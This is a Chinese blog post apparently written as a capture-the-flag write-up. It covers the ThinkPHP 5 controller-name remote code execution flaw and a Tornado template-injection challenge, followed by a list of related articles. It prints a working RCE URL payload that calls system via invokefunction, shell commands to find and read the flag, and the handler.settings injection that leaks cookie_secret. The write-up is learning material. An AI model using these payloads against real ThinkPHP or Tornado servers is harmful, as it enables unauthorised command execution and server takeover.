ThinkPHP V5(漏洞解析及利用)及tornado知识点

最新推荐文章于 2024-06-16 19:36:15 发布
最新推荐文章于 2024-06-16 19:36:15 发布
阅读量3.5k 收藏 3
点赞数 1
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/127134892
版权

ThinkPHP 5漏洞简介


ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。


漏洞分析

程序未对控制器进行过滤,导致攻击者可以用 \(斜杠)调用任意类方法。

漏洞利用

http://159.138.137.79:63571/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /

到这里会出现

可是直接 cat /flag 或者cat /flag/flag,都不对可能有很多层的目录

用到命令 find / -name flag*这样就可以找到很多层的目录,然后cat就行或者

直接cat $(find / -name flag)也可以

easytornado

主要是tornado框架的一些知识点

开局三个选择, flag in /fllllllllllllag

render

md5(cookie_secret+md5(filename)) 

render是模板渲染所以考虑到了ssti,这里我们需要得到的就是cookie_secret这样就行,因为filename我们已经知道了,然后一起md5加密传参就会获得flag 

只可以执行这种,不能执行运算,在tornado官方网站和网上查找资料,最终得到handler指向RequestHandler,而RequestHandler.settings又指向self.application.settings,所以handler.settings就指向RequestHandler.application.settings了

发现里面有cookie_secret所以我们直接传参 handler.settings 

进入第二个选择,这道题重要的是找到注入点,通过试出来时报错这个 

 

 

偶尔躲躲乌云334
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
thinkphp漏洞图形化综合利用工具
05-23
Thinkphp(GUI)漏洞综合利用工具,支持各版本TP漏洞检测,命令执行,getshell。 (如果感觉对您有帮助,感觉不错的话,请您给个大大的支持) JFormDesigner可视化编写,没有javafx可视化好用(建议学javafx)。 检测不...
Think PHP 5 RCE漏洞复现及排查
dayouzi的博客
08-11 2259
ThinkPHP是一款运用极广的PHP开发框架。其漏洞点是由于ThinkPHP框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞
Thinkphp v5.x 远程代码执行漏洞复现及POC集合
qq_67473072的博客
07-13 4479
Thinkphp v5.x 远程代码执行漏洞复现及POC集合
ThinkPHP 5.1.X 反序列化漏洞:深入分析与利用技巧
最新发布
weixin_43822401的博客
06-16 443
Web应用开发中,框架的安全性至关重要。ThinkPHP作为广泛使用的PHP开发框架,其版本5.1.X中存在一个反序列化漏洞,允许攻击者执行任意代码。本文将深入分析该漏洞的原理、利用方法,并提供相应的防护措施。
thinkPHP_V5漏洞
qq_53099802的博客
04-28 3706
php_rce攻防世界
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 8267
ThinkPHP5系列远程代码执行漏洞复现(详细)
ThinkPHP v5.x命令执行利用工具(可getshell)
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
thinkphp漏洞检测工具
06-06
ThinkPHP漏洞检测工具详解》 ThinkPHP是中国最流行的PHP框架之一,因其强大的功能和易用性深受开发者喜爱。然而,任何软件系统都可能存在安全漏洞ThinkPHP也不例外。为了保障Web应用的安全,开发者和安全专家们...
tp5漏洞利用工具.zip
01-03
标题中的“tp5漏洞利用工具.zip”指的是一个包含利用ThinkPHP5框架中安全漏洞的工具包,这个压缩包主要用于测试和展示ThinkPHP5代码执行漏洞利用方式。描述提到,这个工具包含了两种方法,用于在目标系统上检测并...
ThinkPHP框架任意代码执行漏洞利用及其修复方法
10-25
主要介绍了ThinkPHP框架任意代码执行漏洞利用及其修复方法,该漏洞的修复对于广大使用ThinkPHP的开发人员来说尤为重要!需要的朋友可以参考下
thinkphp5 漏洞原理分析合集
m0_46689007的博客
11-30 7027
跟进Request.php中method(),Config::get(‘var_method’)提权var_method中的值,var_method的又为_method,这个_method可控,我们传入’__construct’,到$this->{$this->method}($_POST);因为执行的是get方法,跟进get()方法,此方法为读取配置文件,所以我们构造的参数进入get()中就会控制读取内容,后面返回self::$config[$range][$name[0]][$name[1]]。
ThinkPHP代码执行漏洞
Massimo__JAVA的博客
07-01 1847
特征:被检测系统报错页面出现“十年磨一剑-为API开发设计的高性能框架”,则判定该系统使用ThinkPHP5开发。
ThinkPHP 系列漏洞
SHELLCODE_8BIT的博客
11-18 3366
所有 sql 注入漏洞均在 library/think/db/Builder.php 文件中。1、thinkphp5 SQL注入1漏洞影响版本: 5.0.13
攻防世界 ThinkPHP V5漏洞解析利用
热门推荐
Haowill的博客
04-12 1万+
ThinkPHP V5 攻防世界这道题,考察的是thinkphp V5漏洞,接下来我详细介绍一下thinkphp V5这个漏洞ThinkPHP 5漏洞简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5....
TP 5.0.24反序列化漏洞分析
goddemon
10-20 6199
很久没发过文章了,最近在研究审计链条相关的东西,codeql,ast,以及一些java的东西很多东西还是没学明白就先不写出来丢人了,写这篇tp的原因呢虽然这个漏洞的分析文章蛮多了,但是还是跟着看了下,一方面是因为以前对pop链挖掘一直学的懵懵懂懂的 ctf的一些pop链能出,但是到了框架里面自己就是挖不出来,所以就想着自己挖下tp反序列化的链子来看看,另一方面是想思考学习下php挖掘利用ast手法去该怎么入手(虽然后面这个问题还没解决),所以就有了这篇文章。
Tornado及Bottle 漏洞合集
小小猪的博客
08-20 1092
Tornado 漏洞 Tornado 文件读取漏洞 搭建好环境之后,这时候我们就可以直接请求到/static/01.txt这样的静态文件了: 正常情况下,我们是不能够请求到这个目录以外的文件的,如/etc/passwd: 如上图,tornado对请求的路径进行了一定判断,抛出了这个错误。然后我们去他源码中看看是怎么判断的: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 .
ThinkPHP 系列漏洞_thinkphp漏洞
2401_83739472的博客
04-12 1022
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。attr) : null //进行判断时,需要通过toArray()将getAttr($attr)进行数据类型转换,Output类中不存在toArray()方法,触发 think\console\Output::__call()调用不存在的方法。**一个人可以走的很快,但一群人才能走的更远。薪资区间6k-15k。
ThinkPHP 5.0.* 远程代码执行漏洞
公众号shadow sock7
01-16 7418
以5.0.23搭建环境。 payload如下: POST /thinkphp_5.0.23/public/index.php?s=captcha HTTP/1.1 Host: 192.168.170.186 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Geck...
Thinkphp常见漏洞利用
未完成的歌~的博客
04-14 3795
ThinkPHP是一个开源,快速、简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP。使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。
ThinkPHP框架安全解析:从漏洞到防御
"Thinkphp漏洞挖掘到安全防御.pdf,涵盖了PHP主流..."Thinkphp漏洞挖掘到安全防御"的主题涵盖了从基础的框架原理,到具体的应用实践,再到安全策略的实施,是全面学习和提升Thinkphp应用开发能力的重要参考资料。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值